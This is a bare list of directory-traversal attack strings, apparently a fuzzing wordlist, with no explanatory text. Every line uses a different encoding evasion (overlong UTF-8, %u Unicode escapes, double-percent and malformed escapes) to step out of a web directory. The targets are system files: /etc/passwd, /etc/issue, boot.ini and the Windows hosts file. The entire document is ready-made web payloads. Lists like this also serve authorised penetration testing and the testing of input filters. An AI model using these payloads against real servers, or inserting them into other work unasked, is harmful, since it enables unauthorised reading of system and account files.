-..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9cboot.ini -..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9cetc%c1%9cpasswd -..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9cetc%c1%9cissue -..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9cboot.ini -..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9cetc%c1%9cpasswd -..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9cetc%c1%9cissue -..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9cboot.ini -..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9c..%01%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -..%01%c1%pcetc%c1%pcpasswd -..%01%c1%pcetc%c1%pcissue -..%01%c1%pcboot.ini -..%01%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..%01%c1%pc..%01%c1%pcetc%c1%pcpasswd -..%01%c1%pc..%01%c1%pcetc%c1%pcissue -..%01%c1%pc..%01%c1%pcboot.ini -..%01%c1%pc..%01%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..%01%c1%pc..%01%c1%pc..%01%c1%pcetc%c1%pcpasswd -..%01%c1%pc..%01%c1%pc..%01%c1%pcetc%c1%pcissue -..%01%c1%pc..%01%c1%pc..%01%c1%pcboot.ini -..%01%c1%pc..%01%c1%pc..%01%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pcetc%c1%pcpasswd -..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pcetc%c1%pcissue -..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pcboot.ini -..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pcetc%c1%pcpasswd -..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pcetc%c1%pcissue -..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pcboot.ini -..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pcetc%c1%pcpasswd -..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pcetc%c1%pcissue -..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pcboot.ini -..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pc..%01%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -..%01%c0%9vetc%c0%9vpasswd -..%01%c0%9vetc%c0%9vissue -..%01%c0%9vboot.ini -..%01%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..%01%c0%9v..%01%c0%9vetc%c0%9vpasswd -..%01%c0%9v..%01%c0%9vetc%c0%9vissue -..%01%c0%9v..%01%c0%9vboot.ini -..%01%c0%9v..%01%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..%01%c0%9v..%01%c0%9v..%01%c0%9vetc%c0%9vpasswd -..%01%c0%9v..%01%c0%9v..%01%c0%9vetc%c0%9vissue -..%01%c0%9v..%01%c0%9v..%01%c0%9vboot.ini -..%01%c0%9v..%01%c0%9v..%01%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9vetc%c0%9vpasswd -..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9vetc%c0%9vissue -..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9vboot.ini -..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9vetc%c0%9vpasswd -..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9vetc%c0%9vissue -..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9vboot.ini -..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9vetc%c0%9vpasswd -..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9vetc%c0%9vissue -..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9vboot.ini -..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9v..%01%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -..%01%c0%qfetc%c0%qfpasswd -..%01%c0%qfetc%c0%qfissue -..%01%c0%qfboot.ini -..%01%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..%01%c0%qf..%01%c0%qfetc%c0%qfpasswd -..%01%c0%qf..%01%c0%qfetc%c0%qfissue -..%01%c0%qf..%01%c0%qfboot.ini -..%01%c0%qf..%01%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..%01%c0%qf..%01%c0%qf..%01%c0%qfetc%c0%qfpasswd -..%01%c0%qf..%01%c0%qf..%01%c0%qfetc%c0%qfissue -..%01%c0%qf..%01%c0%qf..%01%c0%qfboot.ini -..%01%c0%qf..%01%c0%qf..%01%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qfetc%c0%qfpasswd -..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qfetc%c0%qfissue -..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qfboot.ini -..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qfetc%c0%qfpasswd -..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qfetc%c0%qfissue -..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qfboot.ini -..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qfetc%c0%qfpasswd -..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qfetc%c0%qfissue -..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qfboot.ini -..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qf..%01%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -..%01%c1%8setc%c1%8spasswd -..%01%c1%8setc%c1%8sissue -..%01%c1%8sboot.ini -..%01%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -..%01%c1%8s..%01%c1%8setc%c1%8spasswd -..%01%c1%8s..%01%c1%8setc%c1%8sissue -..%01%c1%8s..%01%c1%8sboot.ini -..%01%c1%8s..%01%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -..%01%c1%8s..%01%c1%8s..%01%c1%8setc%c1%8spasswd -..%01%c1%8s..%01%c1%8s..%01%c1%8setc%c1%8sissue -..%01%c1%8s..%01%c1%8s..%01%c1%8sboot.ini -..%01%c1%8s..%01%c1%8s..%01%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8setc%c1%8spasswd -..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8setc%c1%8sissue -..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8sboot.ini -..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8setc%c1%8spasswd -..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8setc%c1%8sissue -..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8sboot.ini -..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8setc%c1%8spasswd -..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8setc%c1%8sissue -..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8sboot.ini -..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8s..%01%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -..%01%c1%1cetc%c1%1cpasswd -..%01%c1%1cetc%c1%1cissue -..%01%c1%1cboot.ini -..%01%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -..%01%c1%1c..%01%c1%1cetc%c1%1cpasswd -..%01%c1%1c..%01%c1%1cetc%c1%1cissue -..%01%c1%1c..%01%c1%1cboot.ini -..%01%c1%1c..%01%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -..%01%c1%1c..%01%c1%1c..%01%c1%1cetc%c1%1cpasswd -..%01%c1%1c..%01%c1%1c..%01%c1%1cetc%c1%1cissue -..%01%c1%1c..%01%c1%1c..%01%c1%1cboot.ini -..%01%c1%1c..%01%c1%1c..%01%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1cetc%c1%1cpasswd -..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1cetc%c1%1cissue -..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1cboot.ini -..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1cetc%c1%1cpasswd -..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1cetc%c1%1cissue -..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1cboot.ini -..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1cetc%c1%1cpasswd -..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1cetc%c1%1cissue -..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1cboot.ini -..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1c..%01%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -..%01%c1%afetc%c1%afpasswd -..%01%c1%afetc%c1%afissue -..%01%c1%afboot.ini -..%01%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -..%01%c1%af..%01%c1%afetc%c1%afpasswd -..%01%c1%af..%01%c1%afetc%c1%afissue -..%01%c1%af..%01%c1%afboot.ini -..%01%c1%af..%01%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -..%01%c1%af..%01%c1%af..%01%c1%afetc%c1%afpasswd -..%01%c1%af..%01%c1%af..%01%c1%afetc%c1%afissue -..%01%c1%af..%01%c1%af..%01%c1%afboot.ini -..%01%c1%af..%01%c1%af..%01%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%afetc%c1%afpasswd -..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%afetc%c1%afissue -..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%afboot.ini -..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%afetc%c1%afpasswd -..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%afetc%c1%afissue -..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%afboot.ini -..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%afetc%c1%afpasswd -..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%afetc%c1%afissue -..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%afboot.ini -..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%af..%01%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -..%01%bg%qfetc%bg%qfpasswd -..%01%bg%qfetc%bg%qfissue -..%01%bg%qfboot.ini -..%01%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -..%01%bg%qf..%01%bg%qfetc%bg%qfpasswd -..%01%bg%qf..%01%bg%qfetc%bg%qfissue -..%01%bg%qf..%01%bg%qfboot.ini -..%01%bg%qf..%01%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -..%01%bg%qf..%01%bg%qf..%01%bg%qfetc%bg%qfpasswd -..%01%bg%qf..%01%bg%qf..%01%bg%qfetc%bg%qfissue -..%01%bg%qf..%01%bg%qf..%01%bg%qfboot.ini -..%01%bg%qf..%01%bg%qf..%01%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qfetc%bg%qfpasswd -..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qfetc%bg%qfissue -..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qfboot.ini -..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qfetc%bg%qfpasswd -..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qfetc%bg%qfissue -..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qfboot.ini -..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qfetc%bg%qfpasswd -..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qfetc%bg%qfissue -..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qfboot.ini -..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qf..%01%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -..%01%u2215etc%u2215passwd -..%01%u2215etc%u2215issue -..%01%u2215boot.ini -..%01%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -..%01%u2215..%01%u2215etc%u2215passwd -..%01%u2215..%01%u2215etc%u2215issue -..%01%u2215..%01%u2215boot.ini -..%01%u2215..%01%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -..%01%u2215..%01%u2215..%01%u2215etc%u2215passwd -..%01%u2215..%01%u2215..%01%u2215etc%u2215issue -..%01%u2215..%01%u2215..%01%u2215boot.ini -..%01%u2215..%01%u2215..%01%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -..%01%u2215..%01%u2215..%01%u2215..%01%u2215etc%u2215passwd -..%01%u2215..%01%u2215..%01%u2215..%01%u2215etc%u2215issue -..%01%u2215..%01%u2215..%01%u2215..%01%u2215boot.ini -..%01%u2215..%01%u2215..%01%u2215..%01%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -..%01%u2215..%01%u2215..%01%u2215..%01%u2215..%01%u2215etc%u2215passwd -..%01%u2215..%01%u2215..%01%u2215..%01%u2215..%01%u2215etc%u2215issue -..%01%u2215..%01%u2215..%01%u2215..%01%u2215..%01%u2215boot.ini -..%01%u2215..%01%u2215..%01%u2215..%01%u2215..%01%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -..%01%u2215..%01%u2215..%01%u2215..%01%u2215..%01%u2215..%01%u2215etc%u2215passwd -..%01%u2215..%01%u2215..%01%u2215..%01%u2215..%01%u2215..%01%u2215etc%u2215issue -..%01%u2215..%01%u2215..%01%u2215..%01%u2215..%01%u2215..%01%u2215boot.ini -..%01%u2215..%01%u2215..%01%u2215..%01%u2215..%01%u2215..%01%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -..%01%u2216etc%u2216passwd -..%01%u2216etc%u2216issue -..%01%u2216boot.ini -..%01%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -..%01%u2216..%01%u2216etc%u2216passwd -..%01%u2216..%01%u2216etc%u2216issue -..%01%u2216..%01%u2216boot.ini -..%01%u2216..%01%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -..%01%u2216..%01%u2216..%01%u2216etc%u2216passwd -..%01%u2216..%01%u2216..%01%u2216etc%u2216issue -..%01%u2216..%01%u2216..%01%u2216boot.ini -..%01%u2216..%01%u2216..%01%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -..%01%u2216..%01%u2216..%01%u2216..%01%u2216etc%u2216passwd -..%01%u2216..%01%u2216..%01%u2216..%01%u2216etc%u2216issue -..%01%u2216..%01%u2216..%01%u2216..%01%u2216boot.ini -..%01%u2216..%01%u2216..%01%u2216..%01%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -..%01%u2216..%01%u2216..%01%u2216..%01%u2216..%01%u2216etc%u2216passwd -..%01%u2216..%01%u2216..%01%u2216..%01%u2216..%01%u2216etc%u2216issue -..%01%u2216..%01%u2216..%01%u2216..%01%u2216..%01%u2216boot.ini -..%01%u2216..%01%u2216..%01%u2216..%01%u2216..%01%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -..%01%u2216..%01%u2216..%01%u2216..%01%u2216..%01%u2216..%01%u2216etc%u2216passwd -..%01%u2216..%01%u2216..%01%u2216..%01%u2216..%01%u2216..%01%u2216etc%u2216issue -..%01%u2216..%01%u2216..%01%u2216..%01%u2216..%01%u2216..%01%u2216boot.ini -..%01%u2216..%01%u2216..%01%u2216..%01%u2216..%01%u2216..%01%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -..%01%uEFC8etc%uEFC8passwd -..%01%uEFC8etc%uEFC8issue -..%01%uEFC8boot.ini -..%01%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -..%01%uEFC8..%01%uEFC8etc%uEFC8passwd -..%01%uEFC8..%01%uEFC8etc%uEFC8issue -..%01%uEFC8..%01%uEFC8boot.ini -..%01%uEFC8..%01%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -..%01%uEFC8..%01%uEFC8..%01%uEFC8etc%uEFC8passwd -..%01%uEFC8..%01%uEFC8..%01%uEFC8etc%uEFC8issue -..%01%uEFC8..%01%uEFC8..%01%uEFC8boot.ini -..%01%uEFC8..%01%uEFC8..%01%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8etc%uEFC8passwd -..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8etc%uEFC8issue -..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8boot.ini -..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8etc%uEFC8passwd -..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8etc%uEFC8issue -..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8boot.ini -..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8etc%uEFC8passwd -..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8etc%uEFC8issue -..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8boot.ini -..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8..%01%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -..%01%uF025etc%uF025passwd -..%01%uF025etc%uF025issue -..%01%uF025boot.ini -..%01%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -..%01%uF025..%01%uF025etc%uF025passwd -..%01%uF025..%01%uF025etc%uF025issue -..%01%uF025..%01%uF025boot.ini -..%01%uF025..%01%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -..%01%uF025..%01%uF025..%01%uF025etc%uF025passwd -..%01%uF025..%01%uF025..%01%uF025etc%uF025issue -..%01%uF025..%01%uF025..%01%uF025boot.ini -..%01%uF025..%01%uF025..%01%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -..%01%uF025..%01%uF025..%01%uF025..%01%uF025etc%uF025passwd -..%01%uF025..%01%uF025..%01%uF025..%01%uF025etc%uF025issue -..%01%uF025..%01%uF025..%01%uF025..%01%uF025boot.ini -..%01%uF025..%01%uF025..%01%uF025..%01%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -..%01%uF025..%01%uF025..%01%uF025..%01%uF025..%01%uF025etc%uF025passwd -..%01%uF025..%01%uF025..%01%uF025..%01%uF025..%01%uF025etc%uF025issue -..%01%uF025..%01%uF025..%01%uF025..%01%uF025..%01%uF025boot.ini -..%01%uF025..%01%uF025..%01%uF025..%01%uF025..%01%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -..%01%uF025..%01%uF025..%01%uF025..%01%uF025..%01%uF025..%01%uF025etc%uF025passwd -..%01%uF025..%01%uF025..%01%uF025..%01%uF025..%01%uF025..%01%uF025etc%uF025issue -..%01%uF025..%01%uF025..%01%uF025..%01%uF025..%01%uF025..%01%uF025boot.ini -..%01%uF025..%01%uF025..%01%uF025..%01%uF025..%01%uF025..%01%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -..%01%%32%%66etc%%32%%66passwd -..%01%%32%%66etc%%32%%66issue -..%01%%32%%66boot.ini -..%01%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -..%01%%32%%66..%01%%32%%66etc%%32%%66passwd -..%01%%32%%66..%01%%32%%66etc%%32%%66issue -..%01%%32%%66..%01%%32%%66boot.ini -..%01%%32%%66..%01%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -..%01%%32%%66..%01%%32%%66..%01%%32%%66etc%%32%%66passwd -..%01%%32%%66..%01%%32%%66..%01%%32%%66etc%%32%%66issue -..%01%%32%%66..%01%%32%%66..%01%%32%%66boot.ini -..%01%%32%%66..%01%%32%%66..%01%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66etc%%32%%66passwd -..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66etc%%32%%66issue -..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66boot.ini -..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66etc%%32%%66passwd -..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66etc%%32%%66issue -..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66boot.ini -..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66etc%%32%%66passwd -..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66etc%%32%%66issue -..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66boot.ini -..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66..%01%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -..%01%%35%%63etc%%35%%63passwd -..%01%%35%%63etc%%35%%63issue -..%01%%35%%63boot.ini -..%01%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -..%01%%35%%63..%01%%35%%63etc%%35%%63passwd -..%01%%35%%63..%01%%35%%63etc%%35%%63issue -..%01%%35%%63..%01%%35%%63boot.ini -..%01%%35%%63..%01%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -..%01%%35%%63..%01%%35%%63..%01%%35%%63etc%%35%%63passwd -..%01%%35%%63..%01%%35%%63..%01%%35%%63etc%%35%%63issue -..%01%%35%%63..%01%%35%%63..%01%%35%%63boot.ini -..%01%%35%%63..%01%%35%%63..%01%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63etc%%35%%63passwd -..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63etc%%35%%63issue -..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63boot.ini -..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63etc%%35%%63passwd -..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63etc%%35%%63issue -..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63boot.ini -..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63etc%%35%%63passwd -..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63etc%%35%%63issue -..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63boot.ini -..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63..%01%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -..%01%e0%80%afetc%e0%80%afpasswd -..%01%e0%80%afetc%e0%80%afissue 